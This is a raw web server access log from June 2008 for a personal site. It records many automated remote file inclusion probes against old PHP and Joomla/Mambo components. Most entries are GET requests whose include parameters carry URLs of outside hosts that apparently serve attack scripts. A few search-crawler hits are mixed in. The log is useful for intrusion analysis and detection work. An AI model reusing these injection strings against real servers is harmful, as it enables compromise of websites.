79.171.18.36 - - [25/Jun/2008:10:36:32 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:36:32 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:10:36:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:10:36:38 -0700] "GET /phphtml.php?htmlclass_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:10:37:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:10:37:11 -0700] "GET /phphtml.php?htmlclass_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:37:35 -0700] "GET /logs/access_080215.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:37:36 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:37:36 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:37:38 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:37:39 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:37:45 -0700] "GET /logs/access_080215.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:37:45 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.55.230.236 - - [25/Jun/2008:10:38:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.230.236 - - [25/Jun/2008:10:38:07 -0700] "GET /blog/?show=gallery&pageid=17&nggpage=3 HTTP/1.1" 200 47020 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
209.159.55.66 - - [25/Jun/2008:10:39:05 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.159.55.66 - - [25/Jun/2008:10:39:05 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:39:09 -0700] "GET /logs/access_080312.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:39:09 -0700] "GET /administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:39:09 -0700] "GET /logs/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:39:40 -0700] "GET /logs/access_080312.log/?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:39:43 -0700] "GET /?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 18463 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:39:44 -0700] "GET /logs/?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 53419 "-" "libwww-perl/5.76" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:10:41:23 -0700] "GET /logs/access_080108.log/index.php?seccion=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:10:41:24 -0700] "GET /logs/index.php?seccion=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:41:24 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:10:41:25 -0700] "GET /index.php?seccion=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 200 18405 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.26 - - [25/Jun/2008:10:41:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/?S=A HTTP/1.1" 200 4825 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:41:28 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.32.73.179 - - [25/Jun/2008:10:41:36 -0700] "GET /logs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=7&GLOBALS=&mosConfig_absolute_path=http://www.sarmotiworld-fanclub.com/picturez/pictures/Pics_2007/cdm.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.32.73.179 - - [25/Jun/2008:10:41:37 -0700] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=7&GLOBALS=&mosConfig_absolute_path=http://www.sarmotiworld-fanclub.com/picturez/pictures/Pics_2007/cdm.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.32.73.179 - - [25/Jun/2008:10:41:37 -0700] "GET /logs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=7&GLOBALS=&mosConfig_absolute_path=http://www.sarmotiworld-fanclub.com/picturez/pictures/Pics_2007/cdm.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
216.32.73.179 - - [25/Jun/2008:10:41:37 -0700] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=7&GLOBALS=&mosConfig_absolute_path=http://www.sarmotiworld-fanclub.com/picturez/pictures/Pics_2007/cdm.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:42:21 -0700] "GET /logs/access_080215.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [25/Jun/2008:10:42:28 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unifran.br/blog/mvalentini/poiid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [25/Jun/2008:10:42:28 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unifran.br/blog/mvalentini/poiid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [25/Jun/2008:10:42:28 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unifran.br/blog/mvalentini/poiid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:10:42:42 -0700] "GET /logs/access_071219.log//components/com_simpleboard/file_upload.php?sbp=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:10:42:42 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:10:42:42 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:43:12 -0700] "GET /php_roothttp://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:43:12 -0700] "GET /logs/php_roothttp://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:10:43:21 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [25/Jun/2008:10:43:38 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.unifran.br/blog/mvalentini/poiid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [25/Jun/2008:10:43:38 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.unifran.br/blog/mvalentini/poiid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [25/Jun/2008:10:43:38 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.unifran.br/blog/mvalentini/poiid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [25/Jun/2008:10:43:43 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.unifran.br/blog/mvalentini/poiid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:43:43 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:43:44 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:43:44 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:43:49 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [25/Jun/2008:10:44:14 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unifran.br/blog/mvalentini/poiid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:10:44:24 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:10:44:24 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:10:44:34 -0700] "GET /logs/access_080118.log//components/com_simpleboard/file_upload.php?sbp=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.246.68.51 - - [25/Jun/2008:10:44:36 -0700] "GET /index.php?seccion=http://lodolo.com/x?? HTTP/1.1" 200 18367 "-" "libwww-perl/5.800" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:44:47 -0700] "GET /logs/access.log//components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:44:48 -0700] "GET //components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:44:48 -0700] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:44:49 -0700] "GET /logs/access_080215.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:45:08 -0700] "GET /logs/access_080215.log/?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:10:45:09 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:10:45:09 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:10:45:09 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:45:23 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:45:24 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:45:24 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:45:36 -0700] "GET /php_roothttp://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:45:36 -0700] "GET /logs/php_roothttp://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:46:07 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:46:08 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:46:09 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:46:14 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:46:21 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:46:21 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:46:50 -0700] "GET /logs/index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:46:50 -0700] "GET /logs/index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:46:50 -0700] "GET /index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:46:50 -0700] "GET /index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:10:46:52 -0700] "GET /logs/access_080117.log/index.php?pg=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:10:46:54 -0700] "GET /index.php?pg=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:10:46:55 -0700] "GET /logs/index.php?pg=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:47:03 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:47:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:47:03 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:10:47:09 -0700] "GET /logs//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [25/Jun/2008:10:47:14 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:10:47:15 -0700] "GET /logs//main.php?sayfa=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:10:47:20 -0700] "GET //main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.233.37.131 - - [25/Jun/2008:10:47:20 -0700] "GET /logs/access_071023.log HTTP/1.1" 200 25506 "-" "Mozilla/4.0 (compatible; Windows XP 5.1)" "www.dmulk.com"
210.87.251.41 - - [25/Jun/2008:10:47:25 -0700] "GET /logs/access_071224.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:10:47:25 -0700] "GET //main.php?sayfa=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.87.251.47 - - [25/Jun/2008:10:47:26 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.48 - - [25/Jun/2008:10:47:27 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:10:47:27 -0700] "GET /logs/access_080104.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:10:47:35 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:47:46 -0700] "GET /logs/access.log//components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:47:46 -0700] "GET //components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:47:47 -0700] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:48:15 -0700] "GET /logs/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:48:15 -0700] "GET /mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.251.172 - - [25/Jun/2008:10:48:20 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:48:21 -0700] "GET /logs/access_080321.log/index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:48:21 -0700] "GET /index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:48:21 -0700] "GET /logs/index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:48:22 -0700] "GET /logs/access_080321.log/index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:48:22 -0700] "GET /index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:10:48:22 -0700] "GET /logs/index1.php?l=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:48:28 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:48:29 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:10:48:41 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:10:48:42 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
